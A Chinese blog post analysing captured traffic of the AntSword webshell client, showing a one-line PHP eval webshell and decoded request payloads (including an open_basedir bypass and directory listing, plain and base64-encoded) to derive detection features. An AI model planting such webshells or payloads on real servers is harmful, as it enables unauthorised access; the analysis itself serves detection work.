• 蚁剑流量分析


    蚁剑流量分析

    在靶机上面上传一个一句话木马,并使用蚁剑连接,进行抓包, 一句话木马内容

     @eval($_POST[1]);

    defalut编码器

    在使用蚁剑连接的时候使用default编码器

    连接之后进行的操作行为是查看当前目录(/var/www/html)下的文件,抓取到的流量内容如下:

    对此进行解码并格式化

    1. 1=@ini_set("display_errors", "0");
    2. @set_time_limit(0);
    3. $opdir=@ini_get("open_basedir");
    4. if($opdir) {
    5. $ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);
    6. $oparr=preg_split("/;|:/",$opdir);
    7. @array_push($oparr,$ocwd,sys_get_temp_dir());
    8. foreach($oparr as $item) {
    9. if(!@is_writable($item)) {
    10. continue;
    11. }
    12. ;
    13. $tmdir=$item."/.643496363f4d";
    14. @mkdir($tmdir);
    15. if(!@file_exists($tmdir)) {
    16. continue;
    17. }
    18. @chdir($tmdir);
    19. @ini_set("open_basedir", "..");
    20. $cntarr=@preg_split("/\\\\|\//",$tmdir);
    21. for ($i=0;$i<sizeof($cntarr);$i++) {
    22. @chdir("..");
    23. }
    24. ;
    25. @ini_set("open_basedir","/");
    26. @rmdir($tmdir);
    27. break;
    28. }
    29. ;
    30. }
    31. ;
    32. ;
    33. function asenc($out) {
    34. return $out;
    35. }
    36. ;
    37. function asoutput() {
    38. $output=ob_get_contents();
    39. ob_end_clean();
    40. echo "b2"."ea8";
    41. echo @asenc($output);
    42. echo "63f52"."dd5fe";
    43. }
    44. ob_start();
    45. try {
    46. $D=base64_decode(substr($_POST["r698bc8b603728"],2));
    47. $F=@opendir($D);
    48. if($F==NULL) {
    49. echo("ERROR:// Path Not Found Or No Permission!");
    50. } else {
    51. $M=NULL;
    52. $L=NULL;
    53. while($N=@readdir($F)) {
    54. $P=$D.$N;
    55. $T=@date("Y-m-d H:i:s",@filemtime($P));
    56. @$E=substr(base_convert(@fileperms($P),10,8),-4);
    57. $R=" ".$T." ".@filesize($P)." ".$E."
    58. ";
    59. if(@is_dir($P))$M.=$N."/".$R; else $L.=$N.$R;
    60. }
    61. echo $M.$L;
    62. @closedir($F);
    63. }
    64. ;
    65. }
    66. catch(Exception $e) {
    67. echo "ERROR://".$e->getMessage();
    68. }
    69. ;
    70. asoutput();
    71. die();
    72. &r698bc8b603728=w3L3Zhci93d3cvaHRtbC8=

    分析一下上面的代码:

    • 1是我们的执行参数,此时是执行了一堆php代码,而不是执行了一个简单的system('ls');操作
    • @ini_set("display_errors", "0"); -禁止显示PHP错误信息。
    • @set_time_limit(0); -设置脚本执行时间不受限制。
    • 而这段php代码中有一段接收参数的代码$D=base64_decode(substr($_POST["r698bc8b603728"],2)); 接收php参数r698bc8b603728的值并进行去掉前两位,进行base64解密,在数据末尾我们可以看到r698bc8b603728的值,我们这其进行解码操作,得到的值正是当前路径/var/www/html ,这个值解密之后,传参给@opendir()读取这个路径下面的文件。
      这大概是整个请求的执行逻辑。

    base64编码器

    上面的只是编码设置为default的请求,请求体只是经过了一层url编码,并没有经过过多的编码和加密,再来分析一下base64编码器的情况。

    抓包分析,这里用同样的操作,还是查看/var/www/html下的文件,对比刚刚的看有什么不同

    可以比较直观的看出,请求体并不再是单纯的url编码了,而是混杂了base64编码,对请求体进行一次url解码

    1=@eval(@base64_decode($_POST['ied5afd67ff4a5']));&ied5afd67ff4a5=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7JG9wZGlyPUBpbmlfZ2V0KCJvcGVuX2Jhc2VkaXIiKTtpZigkb3BkaXIpIHskb2N3ZD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7JG9wYXJyPXByZWdfc3BsaXQoIi87fDovIiwkb3BkaXIpO0BhcnJheV9wdXNoKCRvcGFyciwkb2N3ZCxzeXNfZ2V0X3RlbXBfZGlyKCkpO2ZvcmVhY2goJG9wYXJyIGFzICRpdGVtKSB7aWYoIUBpc193cml0YWJsZSgkaXRlbSkpe2NvbnRpbnVlO307JHRtZGlyPSRpdGVtLiIvLmYzOGMxOGRlMCI7QG1rZGlyKCR0bWRpcik7aWYoIUBmaWxlX2V4aXN0cygkdG1kaXIpKXtjb250aW51ZTt9QGNoZGlyKCR0bWRpcik7QGluaV9zZXQoIm9wZW5fYmFzZWRpciIsICIuLiIpOyRjbnRhcnI9QHByZWdfc3BsaXQoIi9cXFxcfFwvLyIsJHRtZGlyKTtmb3IoJGk9MDskaTxzaXplb2YoJGNudGFycik7JGkrKyl7QGNoZGlyKCIuLiIpO307QGluaV9zZXQoIm9wZW5fYmFzZWRpciIsIi8iKTtAcm1kaXIoJHRtZGlyKTticmVhazt9O307O2Z1bmN0aW9uIGFzZW5jKCRvdXQpe3JldHVybiAkb3V0O307ZnVuY3Rpb24gYXNvdXRwdXQoKXskb3V0cHV0PW9iX2dldF9jb250ZW50cygpO29iX2VuZF9jbGVhbigpO2VjaG8gIjM3MzAiLiJmMjEzIjtlY2hvIEBhc2VuYygkb3V0cHV0KTtlY2hvICJjNmMiLiJkY2VlIjt9b2Jfc3RhcnQoKTt0cnl7JEQ9YmFzZTY0X2RlY29kZShzdWJzdHIoJF9QT1NUWyJ2NTM5MTdkYzYyZWFlOCJdLDIpKTskRj1Ab3BlbmRpcigkRCk7aWYoJEY9PU5VTEwpe2VjaG8oIkVSUk9SOi8vIFBhdGggTm90IEZvdW5kIE9yIE5vIFBlcm1pc3Npb24hIik7fWVsc2V7JE09TlVMTDskTD1OVUxMO3doaWxlKCROPUByZWFkZGlyKCRGKSl7JFA9JEQuJE47JFQ9QGRhdGUoIlktbS1kIEg6aTpzIixAZmlsZW10aW1lKCRQKSk7QCRFPXN1YnN0cihiYXNlX2NvbnZlcnQoQGZpbGVwZXJtcygkUCksMTAsOCksLTQpOyRSPSIJIi4kVC4iCSIuQGZpbGVzaXplKCRQKS4iCSIuJEUuIgoiO2lmKEBpc19kaXIoJFApKSRNLj0kTi4iLyIuJFI7ZWxzZSAkTC49JE4uJFI7fWVjaG8gJE0uJEw7QGNsb3NlZGlyKCRGKTt9O31jYXRjaChFeGNlcHRpb24gJGUpe2VjaG8gIkVSUk9SOi8vIi4kZS0+Z2V0TWVzc2FnZSgpO307YXNvdXRwdXQoKTtkaWUoKTs=&v53917dc62eae8=ckL3Zhci93d3cvaHRtbC8=

    再将base64编码进行解码

    1. 1=@eval(@base64_decode($_POST['ied5afd67ff4a5']));
    2. &ied5afd67ff4a5=@ini_set("display_errors", "0");
    3. @set_time_limit(0);
    4. $opdir=@ini_get("open_basedir");
    5. if($opdir) {
    6. $ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);
    7. $oparr=preg_split("/;|:/",$opdir);
    8. @array_push($oparr,$ocwd,sys_get_temp_dir());
    9. foreach($oparr as $item) {
    10. if(!@is_writable($item)) {
    11. continue;
    12. }
    13. ;
    14. $tmdir=$item."/.f38c18de0";
    15. @mkdir($tmdir);
    16. if(!@file_exists($tmdir)) {
    17. continue;
    18. }
    19. @chdir($tmdir);
    20. @ini_set("open_basedir", "..");
    21. $cntarr=@preg_split("/\\\\|\//",$tmdir);
    22. for ($i=0;$i<sizeof($cntarr);$i++) {
    23. @chdir("..");
    24. }
    25. ;
    26. @ini_set("open_basedir","/");
    27. @rmdir($tmdir);
    28. break;
    29. }
    30. ;
    31. }
    32. ;
    33. ;
    34. function asenc($out) {
    35. return $out;
    36. }
    37. ;
    38. function asoutput() {
    39. $output=ob_get_contents();
    40. ob_end_clean();
    41. echo "3730"."f213";
    42. echo @asenc($output);
    43. echo "c6c"."dcee";
    44. }
    45. ob_start();
    46. try {
    47. $D=base64_decode(substr($_POST["v53917dc62eae8"],2));
    48. $F=@opendir($D);
    49. if($F==NULL) {
    50. echo("ERROR:// Path Not Found Or No Permission!");
    51. } else {
    52. $M=NULL;
    53. $L=NULL;
    54. while($N=@readdir($F)) {
    55. $P=$D.$N;
    56. $T=@date("Y-m-d H:i:s",@filemtime($P));
    57. @$E=substr(base_convert(@fileperms($P),10,8),-4);
    58. $R=" ".$T." ".@filesize($P)." ".$E."
    59. ";
    60. if(@is_dir($P))$M.=$N."/".$R; else $L.=$N.$R;
    61. }
    62. echo $M.$L;
    63. @closedir($F);
    64. }
    65. ;
    66. }
    67. catch(Exception $e) {
    68. echo "ERROR://".$e->getMessage();
    69. }
    70. ;
    71. asoutput();
    72. die();
    73. &v53917dc62eae8=ckL3Zhci93d3cvaHRtbC8=

    可以看到本质上是和上面的差不多的,只不过是执行参数1的内容是接收一个参数,并将其进行base64解码和执行,而这个参数ied5afd67ff4a5的值正是需要执行的代码
    同样的我将编码设置为chr除了更加混淆的请求体,基本上还是换汤不换药的套路

    RSA流量加密

    在上面的流量分析种,只不过是套了多层编码,以及编码加入一些脏数据进行混淆,可以很简单的进行还原,但是蚁剑还可以进行对流量进行RSA加密的操作,具体操作如下
    打开RSA编码器设置-->编码管理-->新建编码器-->PHP RSA
    生成编码器之后再点击RSA 配置-->生成

    将生成的php代码上传到服务器,这段代码的连接参数是ant 开始连接木马 抓包

    此时在请求包里面已经没有了传统的@ini_set("display_errors", "0");@set_time_limit(0);了,也没有什么代码,但是缺陷就是响应包里面并没有进行rsa加密

    特性总结

    在对比了多个请求之后,可以分析到以下特征

    • 明文的每一个蚁剑请求的请求体中都包含了@ini_set("display_errors", "0");@set_time_limit(0);
    • 对于加密和编码之后的请求包里面就没有了@ini_set("display_errors", "0");@set_time_limit(0);
    • 如果蚁剑的请求中包含了多个参数,那个该参数的值为前两位为混淆字符,需要删除前两位才能进行base64解码
    • User-Agent 为正常浏览器的ua表示,没有关键性字符,每次请求都可能不同,且经过多次分析发现ua标识里面的系统类型甚至还会进行切换,如此的不规律不就成了一种规律了吗?
    • 蚁剑的响应内容并不一定是明文,也可以是经过编码之后的内容。
      在写此文时,我也参考了别的文章,有文章说蚁剑的ua标识特征为antsword xxx,这个可能是版本问题
  • 相关阅读:
    Vuex中getters和4个map方法的使用
    【Android 屏幕适配】屏幕适配基础概念 ① ( Android 与 iOS 屏幕宽高比种类 | 屏幕像素密度 DPI )
    css问题
    速卖通数据分析怎么看?速卖通数据分析工具有哪些?—站斧浏览器
    JS异步任务的并行、串行,以及二者结合
    大数据Doris(二十五):数据导入演示和其他导入案例
    Javers 比较两个类的差异
    syncthing 多设备同步
    【temu】分析拼多多跨境电商Temu数据分析数据采集
    动态内存管理
  • 原文地址:https://blog.csdn.net/yj520400/article/details/137224890